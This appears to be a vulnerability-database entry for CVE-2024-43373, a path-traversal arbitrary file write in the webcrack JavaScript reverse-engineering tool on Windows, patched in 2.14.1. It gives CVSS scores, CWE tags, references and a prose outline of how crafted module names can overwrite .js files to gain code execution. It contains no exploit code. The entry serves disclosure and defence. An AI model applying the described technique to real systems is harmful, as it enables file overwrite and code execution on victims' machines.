security-advisories@github.com	https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999	Patch
security-advisories@github.com	https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	j4k0xb	webcrack	*
	microsoft	windows	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:j4k0xb:webcrack:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "C997713B-AFD5-4B9F-A1B4-F93649F10B43",
              "versionEndExcluding": "2.14.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "webcrack is a tool for reverse engineering javascript. An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system. This vulnerability allows an attacker to write arbitrary `.js` files to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. This vulnerability has been patched in version 2.14.1."
    },
    {
      "lang": "es",
      "value": "webcrack es una herramienta para realizar ingenier\u00eda inversa en javascript. Existe una vulnerabilidad de escritura de archivos arbitraria en el m\u00f3dulo webcrack cuando se procesa c\u00f3digo malicioso espec\u00edficamente manipulado en sistemas Windows. Esta vulnerabilidad se activa cuando se utiliza la funci\u00f3n de descomprimir paquetes junto con la funci\u00f3n de guardar. Si el nombre de un m\u00f3dulo incluye una secuencia de path traversal con separadores de ruta de Windows, un atacante puede aprovechar esto para sobrescribir archivos en el sistema host. Esta vulnerabilidad permite a un atacante escribir archivos `.js` arbitrarios en el sistema host, que pueden aprovecharse para secuestrar m\u00f3dulos Node.js leg\u00edtimos y obtener la ejecuci\u00f3n de c\u00f3digo arbitrario. Esta vulnerabilidad ha sido parcheada en la versi\u00f3n 2.14.1."
    }
  ],
  "id": "CVE-2024-43373",
  "lastModified": "2024-08-16T21:46:08.440",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "LOW",
          "baseScore": 7.7,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.3,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-08-15T15:15:21.217",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product"
      ],
      "url": "https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-43373 (GCVE-0-2024-43373)

GHSA-CCQH-278P-XQ6W

Summary

Details

PoC

Impact

FKIE_CVE-2024-43373

Tags

Sightings

Nomenclature